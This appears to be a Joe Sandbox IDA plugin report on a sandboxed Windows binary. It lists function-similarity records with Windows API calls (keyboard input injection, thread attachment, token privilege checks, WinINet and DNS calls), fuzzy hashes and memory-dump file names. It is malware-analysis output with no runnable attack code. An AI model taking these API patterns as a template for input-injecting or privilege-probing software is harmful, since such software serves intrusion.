Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3e786eef49f262a1f24e36dcba55aee475ba8c19f7bdd6b35ba88e92b2e9e4e2
Instruction ID: 50a64aa704189cd1f12421eb412efed97d5b811153ea77db3216a37696de346e
Opcode Fuzzy Hash: 3e786eef49f262a1f24e36dcba55aee475ba8c19f7bdd6b35ba88e92b2e9e4e2
Instruction Fuzzy Hash: C1315C70E402086EFF308BA58D05FFBBBA5AB67318F04426BE590522D1C37DA945977D

Function 004A0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 004A0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 004A0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 004A0CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 004A0D33

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9786a31aa3188c22473f749fdd6324eb93c09deadcc17efb64001fae6193560d
Instruction ID: 875441540e7198585d475bbd6c2f4d4b7bd9a150827b681f1ed045bb11a1dde0
Opcode Fuzzy Hash: 9786a31aa3188c22473f749fdd6324eb93c09deadcc17efb64001fae6193560d
Instruction Fuzzy Hash: 873128319402186FFF348A658804BFFBB66AB67320F04432FE485522D1C33D9959975A

Function 004761C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004761FB
__isleadbyte_l.LIBCMT ref: 00476229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00476257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0047628D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: adcdcf2aff15bde09d70d104f873f4985830233a1297bfe180cb8f0b11977d6e
Instruction ID: aeb35864c577c0952fda0f255f6a440c6d6e792fe904709233d786fad275aae8
Opcode Fuzzy Hash: adcdcf2aff15bde09d70d104f873f4985830233a1297bfe180cb8f0b11977d6e
Instruction Fuzzy Hash: 5E31D430600645AFDF21AF75CC48BFB7BAAFF41310F16806AE81897292EB35D950DB55

Function 004C4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004C4F02

Part of subcall function 004A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004A365B
Part of subcall function 004A3641: GetCurrentThreadId.KERNEL32 ref: 004A3662
Part of subcall function 004A3641: AttachThreadInput.USER32(00000000,?,004A5005), ref: 004A3669

GetCaretPos.USER32(?), ref: 004C4F13
ClientToScreen.USER32(00000000,?), ref: 004C4F4E
GetForegroundWindow.USER32 ref: 004C4F54

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 815a14b3c0d0e27997599f363b59c80911fd6a0fbb7f439bf75ac8d948cc3d97
Instruction ID: d4d453e1021db5eeef13b85d97fe5f3b41e3e7aa4228d4e35866aba87392ccff
Opcode Fuzzy Hash: 815a14b3c0d0e27997599f363b59c80911fd6a0fbb7f439bf75ac8d948cc3d97
Instruction Fuzzy Hash: 42313C71D00108AFDB00EFAAC985DEFB7F9EF99304F10406EE415E7201EA799E058BA4

Function 004CC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

GetCursorPos.USER32(?), ref: 004CC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047B9AB,?,?,?,?,?), ref: 004CC4E7
GetCursorPos.USER32(?), ref: 004CC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047B9AB,?,?,?), ref: 004CC56E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2ed1b734ec708d3f0ddc157a54913615ee1d2fc3268160db1ca4d507b1e22d35
Instruction ID: 1296d4ef10f4fe4478a80f728a0b43e9ed1894470ae64cf24b8719d63e75f920
Opcode Fuzzy Hash: 2ed1b734ec708d3f0ddc157a54913615ee1d2fc3268160db1ca4d507b1e22d35
Instruction Fuzzy Hash: 70317539500468FFCB558F58C898EAB7BB5EB09310F44416AF909873A1C739AD51DF98

Function 00498656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0049810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00498121
Part of subcall function 0049810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0049812B
Part of subcall function 0049810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0049813A
Part of subcall function 0049810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00498141
Part of subcall function 0049810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00498157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004986A3
_memcmp.LIBCMT ref: 004986C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004986FC
HeapFree.KERNEL32(00000000), ref: 00498703

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: ce1ea26e7fadb291b61f6c441c78bb52236a8ade2af02af7140023c132653ffd
Instruction ID: b02aacdfa8fa05b56d99757f0325aea53292ce93ca5a1bfd8e311812940375b1
Opcode Fuzzy Hash: ce1ea26e7fadb291b61f6c441c78bb52236a8ade2af02af7140023c132653ffd
Instruction Fuzzy Hash: 7F216B71E40108EFDF10DFA9C949BEEBBB9EF46304F15406AE444AB241DB39AE05CB58

Function 0046098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004609AE

Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004A7896,?,?,00000000), ref: 00445A2C
Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004A7896,?,?,00000000,?,?), ref: 00445A50

_fprintf.LIBCMT ref: 004609E5
OutputDebugStringW.KERNEL32(?), ref: 00495DBB

Part of subcall function 00464AAA: _flsall.LIBCMT ref: 00464AC3

__setmode.LIBCMT ref: 00460A1A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 1c8064d0a5085612cab12dcb1aa45d7be225ea393481ecd4e637bce67c8a7f84
Instruction ID: dd6b91780d037ac3f10d8562d93767a483f4f6741d76ad9c5b24dc6f0b4fb439
Opcode Fuzzy Hash: 1c8064d0a5085612cab12dcb1aa45d7be225ea393481ecd4e637bce67c8a7f84
Instruction Fuzzy Hash: DB1135356042047BDF04B2B69C469BF7B699F92328F20015FF20563282FE2C4D4657AE

Function 004B1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004B17A3

Part of subcall function 004B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004B184C
Part of subcall function 004B182D: InternetCloseHandle.WININET(00000000), ref: 004B18E9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 2783ca05ad547033dde67d5f5adc6df63cd6534bc21a53e94ac5aaa85e275aff
Instruction ID: e0e496cdccac5feaece04c900c0dcd0043dffe4759844e613ad8ec9a9c883415
Opcode Fuzzy Hash: 2783ca05ad547033dde67d5f5adc6df63cd6534bc21a53e94ac5aaa85e275aff
Instruction Fuzzy Hash: F121C535200601BFDB125F609C11FFBB7AAFF48710F50402FF90196660DB79982197B9

Function 004A3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004CFAC0), ref: 004A3A64
GetLastError.KERNEL32 ref: 004A3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 004A3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004CFAC0), ref: 004A3ADF

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b2e873760a359813165bf5801e92b3de2dc06c7e2e9b6c80e3b377dade39b186
Instruction ID: 05990c4188def2105150ae2201e7d2f2a0d11f85412d3a6c7f5fb58435f754d7
Opcode Fuzzy Hash: b2e873760a359813165bf5801e92b3de2dc06c7e2e9b6c80e3b377dade39b186
Instruction Fuzzy Hash: 1A21AB745082119F8700DF25C88186BB7E4AE56369F10492FF499C72E2E739DE4ACB56

Function 004750E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00475101

Part of subcall function 0046571C: __FF_MSGBANNER.LIBCMT ref: 00465733
Part of subcall function 0046571C: __NMSG_WRITE.LIBCMT ref: 0046573A
Part of subcall function 0046571C: RtlAllocateHeap.NTDLL(00AC0000,00000000,00000001,00000000,?,?,?,00460DD3,?), ref: 0046575F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6981ab18c30311f632810a6d6c3baad08de080421856493622ce41089e4ffd45
Instruction ID: 4b9421b9c4c441e13d01a70c74a883df9ac23dfbf69a2c785c77f6880c46c36d
Opcode Fuzzy Hash: 6981ab18c30311f632810a6d6c3baad08de080421856493622ce41089e4ffd45
Instruction Fuzzy Hash: A511EB71D00A156FCB313F71AC057AE3B98DB00366B50852FF90C9E251EE7C8941975D

Function 004B6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004A7896,?,?,00000000), ref: 00445A2C
Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004A7896,?,?,00000000,?,?), ref: 00445A50

gethostbyname.WSOCK32(?,?,?), ref: 004B6399
WSAGetLastError.WSOCK32(00000000), ref: 004B63A4
_memmove.LIBCMT ref: 004B63D1
inet_ntoa.WSOCK32(?), ref: 004B63DC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: cd0386a30e3f24633154057100d5d89ac13510bff7e29d6f5f01266c6f48220f
Instruction ID: 115cf4fbb84bcde72ab90a640f805bb617214d1c6af56c98caad4173054fb5aa
Opcode Fuzzy Hash: cd0386a30e3f24633154057100d5d89ac13510bff7e29d6f5f01266c6f48220f
Instruction Fuzzy Hash: B8119075500109AFCF00FBA5DD46CEEB7B9AF04318B10403AF506B7262DB38AE14DB69

Function 00498B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00498B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00498B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00498B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00498BA4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 35b244cd457df1dadf649e1642599ecf1a15a4afa456af30c1059333fc48d775
Instruction ID: 47bd520647958bd737daa3d524ab01525601d46f4bd66c44a6e192bc24bfa441
Opcode Fuzzy Hash: 35b244cd457df1dadf649e1642599ecf1a15a4afa456af30c1059333fc48d775
Instruction Fuzzy Hash: E3110A79901218BFDF11DB99C885E9EBBB4EB49710F2440A6E900B7250DA716E11DB94

Function 00441290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

DefDlgProcW.USER32(?,00000020,?), ref: 004412D8
GetClientRect.USER32(?,?), ref: 0047B5FB
GetCursorPos.USER32(?), ref: 0047B605
ScreenToClient.USER32(?,?), ref: 0047B610

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 690408bae717811960df0a8e63062b7805cc5879f389cc85c0f4e95d13af4878
Instruction ID: 0cf18d6c3d57c980dd1eef0f3d36aa1e467cae13938b54f1b9a92ca811314c97
Opcode Fuzzy Hash: 690408bae717811960df0a8e63062b7805cc5879f389cc85c0f4e95d13af4878
Instruction Fuzzy Hash: BE115B39600019FFDB00DF94C889DEE77B9FB05300F4004A6F901E3251D778AA968BA9

Function 0049D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0049D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0049D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0049D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0049D897

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: cb65c33b887c556273145507e2a28f28d590b0e027171f5f9723292824b986dd
Instruction ID: a3936ac7fdf6ce5a6c3ddc8acec3be4764eb9fdccfed08ce71b4be3a13dcd17b
Opcode Fuzzy Hash: cb65c33b887c556273145507e2a28f28d590b0e027171f5f9723292824b986dd
Instruction Fuzzy Hash: C7115275A05304DBE720DF90DC09F93BBBCEF00700F10457AA525D6151D7B8E5499BA9

Function 00476FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00476FDB

Part of subcall function 004776C2: __fltout2.LIBCMT ref: 004776EB

__cftog_l.LIBCMT ref: 00477001
__cftoe_l.LIBCMT ref: 00477033

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 67d404ddcf7af89e1dbffb9e4cc5a6f9dfc6708c4628b2e96e141ec71469ece1
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5601407244418ABBCF165F84CC01CEE3F62BB18354F99881AFE1C59131D23AD9B1AB85

Function 004CB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004CB2E4
ScreenToClient.USER32(?,?), ref: 004CB2FC
ScreenToClient.USER32(?,?), ref: 004CB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004CB33B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: d122dbb7407ad4fc1578bddbadd5ea321c11f420d99968db68b0770dc58f4a50
Instruction ID: 6d4ceb39a0dac424aa13835647ccb0ce887c804b7a5b0138cb25503185ebd95d
Opcode Fuzzy Hash: d122dbb7407ad4fc1578bddbadd5ea321c11f420d99968db68b0770dc58f4a50
Instruction Fuzzy Hash: 76117779D00249EFDB41CF99C444AEEBBF5FF08310F104166E914E3220D735AA558F94

Function 004A6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004A6BE6

Part of subcall function 004A76C4: _memset.LIBCMT ref: 004A76F9

_memmove.LIBCMT ref: 004A6C09
_memset.LIBCMT ref: 004A6C16
LeaveCriticalSection.KERNEL32(?), ref: 004A6C26

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 39fed2d61263efc1998ccdca258bc3ddf4dd7b3a45b65e07825a5d0334fcef88
Instruction ID: bd374c1182e78898d7d2d0241f2428aa1c880f4fda7fb4e32fda9e6128196411
Opcode Fuzzy Hash: 39fed2d61263efc1998ccdca258bc3ddf4dd7b3a45b65e07825a5d0334fcef88
Instruction Fuzzy Hash: 7BF0543A100100BBCF416F56DC85E8ABF2AEF55364F0480A5FE085E227D736E811CBB9

Function 00442218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00442231
SetTextColor.GDI32(?,000000FF), ref: 0044223B
SetBkMode.GDI32(?,00000001), ref: 00442250
GetStockObject.GDI32(00000005), ref: 00442258
GetWindowDC.USER32(?,00000000), ref: 0047BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0047BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0047BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0047BEC2
GetPixel.GDI32(00000000,?,?), ref: 0047BEE2
ReleaseDC.USER32(?,00000000), ref: 0047BEED

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
